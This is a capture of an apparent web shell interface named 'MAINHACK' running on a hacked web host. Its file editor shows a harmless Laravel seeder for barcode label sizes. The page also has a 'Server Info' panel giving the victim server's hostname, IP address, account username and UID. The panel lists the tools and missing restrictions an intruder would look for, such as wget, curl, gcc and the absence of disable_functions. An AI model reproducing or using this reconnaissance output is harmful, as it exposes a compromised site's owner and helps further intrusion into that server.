[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: BarcodesTableSeeder.php
<?php namespace Database\Seeders; use App\Barcode; use Illuminate\Database\Seeder; class BarcodesTableSeeder extends Seeder { /** * Run the database seeds. * * @return void */ public function run() { Barcode::create([ 'id' => 1, 'name' => '20 Labels per Sheet', 'description' => 'Sheet Size: 8.5" x 11", Label Size: 4" x 1", Labels per sheet: 20', 'width' => 4, 'height' => 1, 'paper_width' => 8.5, 'paper_height' => 11, 'top_margin' => 0.5, 'left_margin' => 0.125, 'row_distance' => 0.00, 'col_distance' => 0.1875, 'stickers_in_one_row' => 2, 'is_default' => 0, 'is_continuous' => 0, 'stickers_in_one_sheet' => 20, 'business_id' => null, 'created_at' => '2017-12-18 06:13:44', 'updated_at' => '2017-12-18 06:13:44', ]); Barcode::create([ 'id' => 2, 'name' => '30 Labels per sheet', 'description' => 'Sheet Size: 8.5" x 11", Label Size: 2.625" x 1", Labels per sheet: 30', 'width' => 2.625, 'height' => 1, 'paper_width' => 8.5, 'paper_height' => 11, 'top_margin' => 0.5, 'left_margin' => 0.188, 'row_distance' => 0.00, 'col_distance' => 0.125, 'stickers_in_one_row' => 3, 'is_default' => 0, 'is_continuous' => 0, 'stickers_in_one_sheet' => 30, 'business_id' => null, 'created_at' => '2017-12-18 06:04:39', 'updated_at' => '2017-12-18 06:10:40', ]); Barcode::create([ 'id' => 3, 'name' => '32 Labels per sheet', 'description' => 'Sheet Size: 8.5" x 11", Label Size: 2" x 1.25", Labels per sheet: 32', 'width' => 2, 'height' => 1.25, 'paper_width' => 8.5, 'paper_height' => 11, 'top_margin' => 0.5, 'left_margin' => 0.25, 'row_distance' => 0.00, 'col_distance' => 0, 'stickers_in_one_row' => 4, 'is_default' => 0, 'is_continuous' => 0, 'stickers_in_one_sheet' => 32, 'business_id' => null, 'created_at' => '2017-12-18 05:55:40', 'updated_at' => '2017-12-18 05:55:40', ]); Barcode::create([ 'id' => 4, 'name' => '40 Labels per sheet', 'description' => 'Sheet Size: 8.5" x 11", Label Size: 2" x 1", Labels per sheet: 40', 'width' => 2, 'height' => 1, 'paper_width' => 8.5, 'paper_height' => 11, 'top_margin' => 0.5, 'left_margin' => 0.25, 'row_distance' => 0.00, 'col_distance' => 0.00, 'stickers_in_one_row' => 4, 'is_default' => 0, 'is_continuous' => 0, 'stickers_in_one_sheet' => 40, 'business_id' => null, 'created_at' => '2017-12-18 05:58:40', 'updated_at' => '2017-12-18 05:58:40', ]); Barcode::create([ 'id' => 5, 'name' => '50 Labels per Sheet', 'description' => 'Sheet Size: 8.5" x 11", Label Size: 1.5" x 1", Labels per sheet: 50', 'width' => 1.5, 'height' => 1, 'paper_width' => 8.5, 'paper_height' => 11, 'top_margin' => 0.5, 'left_margin' => 0.5, 'row_distance' => 0.00, 'col_distance' => 0.00, 'stickers_in_one_row' => 5, 'is_default' => 0, 'is_continuous' => 0, 'stickers_in_one_sheet' => 50, 'business_id' => null, 'created_at' => '2017-12-18 05:51:10', 'updated_at' => '2017-12-18 05:51:10', ]); Barcode::create([ 'id' => 6, 'name' => 'Continuous Rolls - 31.75mm x 25.4mm', 'description' => 'Label Size: 31.75mm x 25.4mm, Gap: 3.18mm', 'width' => 1.25, 'height' => 1, 'paper_width' => 1.25, 'paper_height' => 0.00, 'top_margin' => 0.125, 'left_margin' => 0.00, 'row_distance' => 0.125, 'col_distance' => 0.00, 'stickers_in_one_row' => 1, 'is_default' => 0, 'is_continuous' => 1, 'stickers_in_one_sheet' => null, 'business_id' => null, 'created_at' => '2017-12-18 05:51:10', 'updated_at' => '2017-12-18 05:51:10', ]); // Barcode::create( [ // 'name'=>'154 Per Sheet', // 'description'=>'Sheet Size: 8.5" x 11", Label Size: 25.4mm x 9.52mm, Labels per sheet: 154', // 'width'=>25.40, // 'height'=>9.52, // 'paper_width'=>8.5, // 'paper_height'=>11, // 'top_margin'=>8.79, // 'left_margin'=>11.43, // 'row_distance'=>2.54, // 'col_distance'=>2.49, // 'stickers_in_one_row'=>7, // 'is_default'=>0, // 'is_continuous'=>0, // 'stickers_in_one_sheet'=>154, // 'business_id'=>null, // 'created_at'=>'2017-12-18 05:43:01', // 'updated_at'=>'2017-12-18 05:45:54' // ] ); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.86 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285